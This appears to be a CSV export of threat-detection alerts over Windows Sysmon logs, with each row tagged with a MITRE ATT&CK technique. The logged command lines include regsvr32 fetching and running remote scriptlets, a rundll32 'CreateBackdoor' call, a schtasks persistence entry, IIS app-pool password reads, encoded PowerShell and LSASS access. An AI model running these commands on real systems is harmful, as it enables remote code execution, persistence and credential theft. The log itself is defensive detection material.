SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0D3F-5CD7-0000-00107F541600 + 3212 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16116 + + + + + 
Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:58:50.075 + 365ABB72-0D5A-5CD7-0000-001069031700 + 2544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0D3F-5CD7-0000-00107F541600 + 3212 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16116 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:58:50.075 + 365ABB72-0D5A-5CD7-0000-001069031700 + 2544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0D3F-5CD7-0000-00107F541600 + 3212 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational 
+[T1117] Bypassing Application Whitelisting,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16792 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.140 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-6693-5CD8-0000-0010AE4C0E00 + 3528 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18918 + + + + + Microsoft-Windows-Sysmon/Operational + DC1.insecurebank.local + + + + + technique_id=T1033,technique_name=System Owner/User Discovery + 2019-05-16 16:08:40.350 + DFAE8213-8B08-5CDD-0000-001011CE0A00 + 3764 + C:\Windows\System32\whoami.exe + 6.3.9600.16384 (winblue_rtm.130821-1623) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + DFAE8213-832F-5CDD-0000-0020E7030000 + 0x3e7 + 2 + System + 
SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47 + DFAE8213-8B02-5CDD-0000-00109BCA0A00 + 1720 + C:\Windows\System32\osk.exe + "C:\Windows\System32\osk.exe" + +",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16792 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.140 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-6693-5CD8-0000-0010AE4C0E00 + 3528 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16792 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:05.140 + 
365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-63FC-5CD8-0000-0020EE3E0100 + 0x13eee + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-6693-5CD8-0000-0010AE4C0E00 + 3528 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243538 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.021 + 747F3D96-9F69-5E75-0000-00106F6A2000 + 2536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1589329703.257302,2020-05-13T04:28:23.257302+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 148597 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-13 00:28:16.115 + 747F3D96-3F20-5EBB-0000-0010035E3600 + 8052 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-3821-5EBB-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-3821-5EBB-0000-001040690000 + 732 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243538 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.021 + 747F3D96-9F69-5E75-0000-00106F6A2000 + 2536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + 
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c pause ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 376 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 00:35:07.386 + 365ABB72-47BB-5CE3-0000-00108CAD3E00 + 3176 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /c pause + C:\Users\IEUser\Downloads\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-47BB-5CE3-0000-0010BFA83E00 + 1912 + C:\Users\IEUser\Downloads\com-hijack.exe + "C:\Users\IEUser\Downloads\com-hijack.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243538 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.021 + 747F3D96-9F69-5E75-0000-00106F6A2000 + 2536 + 
C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969979.57807,2019-05-27T19:12:59.578070+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6193 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:59.510 + 365ABB72-FE7B-5CEB-0000-0010867F0C00 + 4012 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn "eyNQLDvUSuvVPg" /tr "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + 
C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process Access,1552849805.303341,2019-03-17T23:10:05.303341+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," + + + + + 10 + 3 + 4 + 10 + 0 + 0x8000000000000000 + + + 4442 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 19:10:02.068 + 365ABB72-9B85-5C8E-0000-0010C4CC1200 + 3576 + 3620 + C:\Windows\system32\taskmgr.exe + 365ABB72-0886-5C8F-0000-001030560000 + 476 + C:\Windows\system32\lsass.exe + 0x1fffff + C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Windows\system32\taskmgr.exe+1360e|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557686932.766629,2019-05-12T22:48:52.766629+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16840 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:48:52.344 + 365ABB72-6A94-5CD8-0000-0010C2F10E00 + 3880 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-695E-5CD8-0000-002015370100 + 0x13715 + 1 + Medium + 
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-6A94-5CD8-0000-00101BDB0E00 + 1340 + C:\ProgramData\jabber.exe + jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.971708,2019-05-27T05:29:17.971708+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5907 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.931 + 365ABB72-3D6D-5CEB-0000-00108C7FFF00 + 3196 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Line Number: 0" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1555606584.893827,2019-04-18T20:56:24.893827+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command 
line ( Powershell ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 13 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1086,technique_name=PowerShell + 2019-04-18 16:56:08.340 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + Powershell + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AC01-5CB8-0000-0010BB7E0700 + 1196 + C:\Windows\System32\cmd.exe + "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18851 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-18 17:51:14.254 + 365ABB72-4612-5CE0-0000-00103D1E2600 + 2600 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-433D-5CE0-0000-002031350100 + 0x13531 + 1 + Medium + 
SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-433C-5CE0-0000-00100FD20000 + 964 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18851 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-18 17:51:14.254 + 365ABB72-4612-5CE0-0000-00103D1E2600 + 2600 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-433D-5CE0-0000-002031350100 + 0x13531 + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-433C-5CE0-0000-00100FD20000 + 964 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18851 + + + + + 
Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-18 17:51:14.254 + 365ABB72-4612-5CE0-0000-00103D1E2600 + 2600 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-433D-5CE0-0000-002031350100 + 0x13531 + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-433C-5CE0-0000-00100FD20000 + 964 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.891593,2019-05-27T05:29:17.891593+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5904 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.851 + 365ABB72-3D6D-5CEB-0000-0010C47BFF00 + 560 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6192 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.612 + 365ABB72-FE76-5CEB-0000-001015780C00 + 1260 + \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe + ? + ? + ? + ? + \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + 